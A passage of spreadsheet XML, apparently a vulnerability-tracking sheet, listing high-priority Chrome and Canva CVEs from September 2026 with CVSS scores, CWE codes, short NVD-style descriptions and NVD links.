      <c r="K327" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="L327" s="5" t="inlineStr">
        <is>
          <t>The Canva Android App before 2.376.0 allowed an external origin to be loaded in a privileged WebView. A threat actor who controls the page loaded by the user is able to communicate with Canva using the user’s session.</t>
        </is>
      </c>
      <c r="M327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85085</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87438</t>
        </is>
      </c>
      <c r="C328" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D328" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E328" s="5" t="inlineStr"/>
      <c r="F328" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87438</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87448</t>
        </is>
      </c>
      <c r="C329" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D329" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E329" s="5" t="inlineStr"/>
      <c r="F329" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87448</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87455</t>
        </is>
      </c>
      <c r="C330" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D330" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E330" s="5" t="inlineStr"/>
      <c r="F330" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr">
        <is>
          <t>Use after free in Aura in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87455</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87464</t>
        </is>
      </c>
      <c r="C331" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D331" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E331" s="5" t="inlineStr"/>
      <c r="F331" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I331" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L331" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87464</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87470</t>
        </is>
      </c>
      <c r="C332" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D332" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E332" s="5" t="inlineStr"/>
      <c r="F332" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr">
        <is>
          <t>Improper quantity validation in Tint in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87470</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87474</t>
        </is>
      </c>
      <c r="C333" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D333" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E333" s="5" t="inlineStr"/>
      <c r="F333" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87474</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87488</t>
        </is>
      </c>
      <c r="C334" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D334" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E334" s="5" t="inlineStr"/>
      <c r="F334" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L334" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87488</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87492</t>
        </is>
      </c>
      <c r="C335" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D335" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E335" s="5" t="inlineStr"/>
      <c r="F335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L335" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87492</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87494</t>
        </is>
      </c>
      <c r="C336" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D336" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E336" s="5" t="inlineStr"/>
      <c r="F336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G336" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H336" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I336" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr">
        <is>
          <t>Use after free in Browser in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87494</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87500</t>
        </is>
      </c>
      <c r="C337" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D337" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E337" s="5" t="inlineStr"/>
      <c r="F337" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I337" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="L337" s="5" t="inlineStr">
        <is>
          <t>Improper validation of array index in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87500</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87504</t>
        </is>
      </c>
      <c r="C338" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D338" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E338" s="5" t="inlineStr"/>
      <c r="F338" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87504</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87512</t>
        </is>
      </c>
      <c r="C339" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D339" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E339" s="5" t="inlineStr"/>
      <c r="F339" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G339" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H339" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L339" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87512</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87520</t>
        </is>
      </c>
      <c r="C340" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D340" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E340" s="5" t="inlineStr"/>
      <c r="F340" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I340" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87520</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87526</t>
        </is>
      </c>
      <c r="C341" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D341" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E341" s="5" t="inlineStr"/>
      <c r="F341" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I341" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr">
        <is>
          <t>Use after free in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87526</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87527</t>
        </is>
      </c>
      <c r="C342" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D342" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E342" s="5" t="inlineStr"/>
      <c r="F342" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I342" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87527</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87528</t>
        </is>
      </c>
      <c r="C343" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D343" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E343" s="5" t="inlineStr"/>
      <c r="F343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G343" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H343" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I343" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Rust in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87528</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87529</t>
        </is>
      </c>
      <c r="C344" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D344" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E344" s="5" t="inlineStr"/>
      <c r="F344" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I344" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87529</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87547</t>
        </is>
      </c>
      <c r="C345" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D345" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E345" s="5" t="inlineStr"/>
      <c r="F345" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I345" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L345" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87547</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87558</t>
        </is>
      </c>
      <c r="C346" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D346" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E346" s="5" t="inlineStr"/>
      <c r="F346" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I346" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L346" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87558</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87581</t>
        </is>
      </c>
      <c r="C347" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D347" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E347" s="5" t="inlineStr"/>
      <c r="F347" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I347" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L347" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87581</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87607</t>
        </is>
      </c>
      <c r="C348" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D348" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E348" s="5" t="inlineStr"/>
      <c r="F348" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L348" s="5" t="inlineStr">
        <is>
          <t>Use after free in Device in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87607</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87609</t>
        </is>
      </c>
      <c r="C349" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D349" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E349" s="5" t="inlineStr"/>
      <c r="F349" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I349" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr">
        <is>
          <t>Use after free in Sharing in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87609</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87621</t>
        </is>
      </c>
      <c r="C350" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D350" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E350" s="5" t="inlineStr"/>
      <c r="F350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G350" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H350" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I350" s="5" t="inlineStr">
        <is>
